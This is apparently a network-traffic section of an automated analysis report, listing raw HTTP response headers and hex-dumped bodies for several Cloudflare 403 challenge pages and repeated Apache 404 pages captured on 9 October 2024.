        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:38:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:38:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQ1vhDzew5KD6KeLZgP%2FG6T0kV48G3oEB7pjCulSitPF6RWxI2wQNy%2BtwDSGu49GIMccWGZHiiaCBveFsXG8HreVAhw28JOSQYLCWUmfEtuNxpG87QJ2%2BjDXqmBcZWbkr7KkKCdSX0RFjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8cfe1525fe470cc8-EWRContent-Encoding: gzipData Raw: 36 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f db 38 12 fd df 9f 62 a2 03 12 1b b0 24 bb db 6e 53 47 d6 61 af cd 01 01 7a d8 ee 36 c5 5d b1 28 02 8a 1c 59 dc 50 a4 8e a4 ac 18 b9 7c f7 05 45 c9 96 7f 24 7b c5 1d 10 20 a2 38 7c 33 f3 f8 66 44 3a 39 fb f0 f3 fb db af 9f ae a1 b0 a5 48 47 c9 59 18 fe c6 73 10 16 6e ae e1 ed b7 14 12 37 01 54 10 63 96 81 54 e1 ef 06 38 fe 08 4a 30 8e 01 08 22 57 cb 00 65 f8 e5 73 90 42 72 f6 1b 4a c6 f3 6f 61 b8 83 ea 70 00 4e 43 bd fd 3e a8 cb 17 a0 2e bf 03 6a 65 3b 34 f7 e2 54 96 c7 28 61 b8 8f 54 20 61 e9 28 b1 dc 0a 4c 7f b2 16 a5 e5 4a c2 af f8 ef 9a 6b 64 67 f0 1f 78 2f 54 cd 72 41 34 26 b1 b7 1b 25 25 5a 02 b4 20 da a0 5d 06 5f 6e ff 1e 5e 06 10 f7 13 85 b5 55 e8 10 d6 cb e0 bd 92 0e 34 bc dd 54 18 00 f5 a3 65 60 f1 c1 c6 2e de ab 2d cc 4b 28 ff 0a bf fc 14 be 57 65 45 2c cf c4 10 e8 e6 7a 79 cd 56 38 58 27 49 89 cb 40 ab 4c 59 33 30 94 8a 4b 86 0f 53 90 2a 57 42 a8 e6 68 c9 9a 63 53 29 6d 07 8b 1a ce 6c b1 64 b8 e6 14 c3 76 30 e5 92 5b 4e 44 68 28 11 b8 9c 7b 14 c1 e5 3d 68 14 cb c0 d8 8d 40 53 20 da 00 38 5b 06 34 bf f3 af 42 6a 4c 00 85 c6 7c 19 c4 94 c9 90 ae 78 ec a7 62 9a 47 a8 b5 d2 26 6a 8d e2 43 0d bf fb 96 3e ef e2 62 e7 82 a3 f3 72 f1 a7 5e 38 f6 8e f6 d5 d0 1a a6 99 62 9b c7 92 e8 15 97 8b d9 55 45 18 e3 72 b5 98 3d 25 1e 28 1d 8d 06 0a 44 17 df 7c d6 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 26 c9 9a af 88 55 3a a2 4a dd 73 bc 96 24 13 c8 26 f0 38 72 25 d0 70 c9 54 13 11 c6 ae d7 28 ed 47 6e 2c 4a d4 e3 8b 0f 3f ff a3 53 ce 47 45 18 b2 8b 29 e4 b5 a4 ad 38 c7 fd 6a 80 35 d1 d0 01 0b 58 02 53 b4 2e 51 da 68 85 f6 5a a0 7b fc db e6 86 8d 2f bc 4d 48 04 6a 7b 31 b9 ea 56 f7 2b a3 36 af 88 71 53 09 b2 81 25 5c 64 42 d1 fb 0b 6f f7 34 19 01 3c 8d 92 Data Ascii: 6ceXo8b$nSGaz6](YP|E${ 8|3fD:9HGYsn7TcT8J0"WesBrJoapNC>.je;4T(aT a(LJkdgx/TrA4&%%Z ]_n^U4Te`.-K(WeE,zyV8X'I@LY30KS*WBhcS)mldv0[NDh({=h@S 8[4BjL|xbG&jC>br^8bUEr=%(D|ipyea|&U:Js$&8r%pT(Gn,J?SGE)8j5XS.QhZ{
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:38:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:38:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BNOmL4dh5VPKKLEPtm8qWwHw8zZ%2F%2BIJBhOdT6QhMdtAwTvQh3B8EqFrPPBcC%2FOpKqQ7q3xqW%2Br9fTvWzxovW%2BxKQ0xhAKIC6NH6T74ap%2FvftFwbxDfDHsli%2FR2zjX1QND0XUDCWbnuCig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8cfe15365e6d43be-EWRContent-Encoding: gzipData Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 a2 02 f6 2e 60 4a de bc 3a b6 56 c5 35 71 01 03 29 2e 77 71 d0 06 87 c0 a0 c8 d1 8a 67 8a 54 49 6a e5 85 eb ff 7e a0 28 ad b5 2f f6 35 68 01 03 16 c5 e1 33 33 0f 9f 19 91 9b be f8 f8 f3 87 eb 6f 9f 2f a1 74 95 cc 26 e9 0b 42 7e 13 05 48 07 57 97 f0 ee 7b 06 a9 9f 00 26 a9 b5 8b 48 69 f2 bb 05 81 6f 41 4b 2e 30 02 49 d5 72 11 a1 22 5f bf 44 19 a4 2f 7e 43 c5 45 f1 9d 90 47 a8 1e 07 e0 30 d4 bb 1f 83 3a 7b 06 ea ec 07 a0 96 ae 47 f3 2f 0e 65 b9 8f 42 c8 36 52 89 94 67 93 d4 09 27 31 fb c9 39 54 4e 68 05 bf e2 bf 1b 61 90 bf 80 ff c0 07 a9 1b 5e 48 6a 30 4d 82 dd 24 ad d0 51 60 25 35 16 dd 22 fa 7a fd 77 72 16 41 32 4c 94 ce d5 c4 23 ac 16 d1 07 ad 3c 28 b9 5e d7 18 01 0b a3 45 e4 f0 ce 25 3e de 8b 0d cc 73 28 ff 22 5f 7f 22 1f 74 55 53 27 72 39 06 ba ba 5c 5c f2 25 8e d6 29 5a e1 22 32 3a d7 ce 8e 0c 95 16 8a e3 dd 09 28 5d 68 29 75 bb b7 64 25 b0 ad b5 71 a3 45 ad e0 ae 5c 70 5c 09 86 a4 1b 9c 08 25 9c a0 92 58 46 25 2e e6 01 45 0a 75 0b 06 e5 22 b2 6e 2d d1 96 88 2e 02 c1 17 11 2b 6e c2 2b c2 ac 8d a0 34 58 2c a2 84 71 45 d8 52 24 61 2a 61 45 8c c6 68 63 e3 ce 28 d9 d5 f0 fb ef d9 d3 2e 8e 1f 5d 08 f4 5e 8e ff d4 8b c0 c1 d1 b6 1a 3a c3 2c d7 7c 7d 5f 51 b3 14 ea fc f4 a2 a6 9c 0b b5 3c 3f 7d 48 03 50 36 99 8c 14 88 3e be f9 69 af c1 49 6a 99 11 b5 cb 26 00 a2 80 e9 0b 45 57 62 49 9d 36 31 d3 fa 56 e0 a5 a2 b9 44 3e 83 fb 89 2f 81 56 28 ae db 98 72 7e b9 42 e5 3e 09 eb 50 a1 99 1e 7f fc f9 1f bd 72 3e 69 ca 91 1f 9f 40 d1 28 d6 89 73 3a ac 06 58 51 03 3d b0 84 05 70 cd 9a 0a 95 8b 97 e8 2e 25 fa c7 bf ad af f8 f4 38 d8 10 2a d1 b8 e3 d9 45 bf 7a 58 19 77 79 c5 5c d8 5a d2 35 2c e0 38 97 9a dd 1e 07 bb Data Ascii: 6cdXmob.`J:V5q).wqgTIj~(/5h33o/t&B~HW{&HioAK.0Ir"_D/~CEG0:{G/eB6Rg'19TNha^Hj0M$Q`%5"zwrA2L#<(^E%>s("_"tUS'r9\\%)Z"2:(]h)ud%qE\p\%XF%.Eu"n-.+n+4X,qER$a*aEhc(.]^:,|}_Q<?}HP6>iIj&EWbI61VD>/V(r~B>Pr>i@(s:XQ=p.%8*EzX
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:38:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:38:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DuHcoaNo%2BJB1tgzo4wszli8GaECsSrCcjgovlkSpqgNx1%2BZgnlyT4%2BVPljDsUFJIjAstM3RW%2FM%2FBzIkMSosmHUsNtYvkISpqMgAVLbk4ANcwANU0FPGfzs1AYBAvBKe7lrsnvm0J%2Fm6MhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 8cfe1546cf600f89-EWRContent-Encoding: gzipData Raw: 36 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c c9 de db 97 ac 23 ab b8 ee a6 40 80 2d 6e 7b 9b 45 bb 38 2c 02 8a 1c 59 bc 50 a4 4a 52 56 8c 34 ff bd a0 28 d9 f2 4b 72 5d b4 40 80 88 e2 f0 99 99 87 cf 8c 48 27 67 1f 7f f9 70 fb ed f3 35 14 b6 14 e9 28 39 0b c3 df 78 0e c2 c2 cd 35 bc fb 9e 42 e2 26 80 0a 62 cc 32 90 2a fc dd 00 c7 b7 a0 04 e3 18 80 20 72 b5 0c 50 86 5f bf 04 29 24 67 bf a1 64 3c ff 1e 86 3b a8 0e 07 e0 34 d4 bb 1f 83 ba 7c 01 ea f2 07 a0 56 b6 43 73 2f 4e 65 79 8c 12 86 fb 48 05 12 96 8e 12 cb ad c0 f4 67 6b 51 5a ae 24 fc 8a ff aa b9 46 76 06 ff 86 0f 42 d5 2c 17 44 63 12 7b bb 51 52 a2 25 40 0b a2 0d da 65 f0 f5 f6 af e1 65 00 71 3f 51 58 5b 85 0e 61 bd 0c 3e 28 e9 40 c3 db 4d 85 01 50 3f 5a 06 16 1f 6c ec e2 bd da c2 bc 84 f2 cf f0 eb cf e1 07 55 56 c4 f2 4c 0c 81 6e ae 97 d7 6c 85 83 75 92 94 b8 0c b4 ca 94 35 03 43 a9 b8 64 f8 30 05 a9 72 25 84 6a 8e 96 ac 39 36 95 d2 76 b0 a8 e1 cc 16 4b 86 6b 4e 31 6c 07 53 2e b9 e5 44 84 86 12 81 cb b9 47 11 5c de 83 46 b1 0c 8c dd 08 34 05 a2 0d 80 b3 65 40 f3 3b ff 2a a4 c6 04 50 68 cc 97 41 4c 99 0c e9 8a c7 7e 2a a6 79 84 5a 2b 6d a2 d6 28 3e d4 f0 fb ef e9 f3 2e 2e 76 2e 38 3a 2f 17 7f e8 85 63 ef 68 5f 0d ad 61 9a 29 b6 79 2c 89 5e 71 b9 98 5d 55 84 31 2e 57 8b d9 53 e2 81 d2 d1 68 a0 40 74 f1 cd 67 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 67 92 ac f9 8a 58 a5 23 aa d4 3d c7 6b 49 32 81 6c 02 8f 23 57 02 0d 97 4c 35 11 61 ec 7a 8d d2 7e e2 c6 a2 44 3d be f8 f8 cb df 3a e5 7c 52 84 21 bb 98 42 5e 4b da 8a 73 dc af 06 58 13 0d 1d b0 80 25 30 45 eb 12 a5 8d 56 68 af 05 ba c7 bf 6c 6e d8 f8 c2 db 84 44 a0 b6 17 93 ab 6e 75 bf 32 6a f3 8a 18 37 95 20 1b 58 c2 45 26 14 bd bf f0 76 4f Data Ascii: 6ceXmo_1Q,#@-n{E8,YPJRV4(Kr]@H'gp5(9x5B&b2* rP_)$gd<;4|VCs/NeyHgkQZ$FvB,Dc{QR%@eeq?QX[a>(@MP?ZlUVLnlu5Cd0r%j96vKkN1lS.DG\F4e@;*PhAL~*yZ+m(>..v.8:/ch_a)y,^q]U1.WSh@tgGW6gX#=kI2l#WL5az~D=:|R!B^KsX%0EVhlnD
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 11:38:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Wed, 09 Oct 2024 11:38:30 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m80Cn95ZP8xe5WAgDf%2FeBKhbqCPOih%2F0niV1q%2FAUvyklueH1kQuNds19p8t%2F5z06iqaXqf1brZAWVuvdkAIEQaBixsMbAdHh1bVHZVNe3YcrYYcOQTI2HvCWW1%2FVp47CqCyXBooR15n62w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cfe1557298f42e0-EWRData Raw: 31 31 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e Data Ascii: 11ab<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta na
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:34 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:37 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 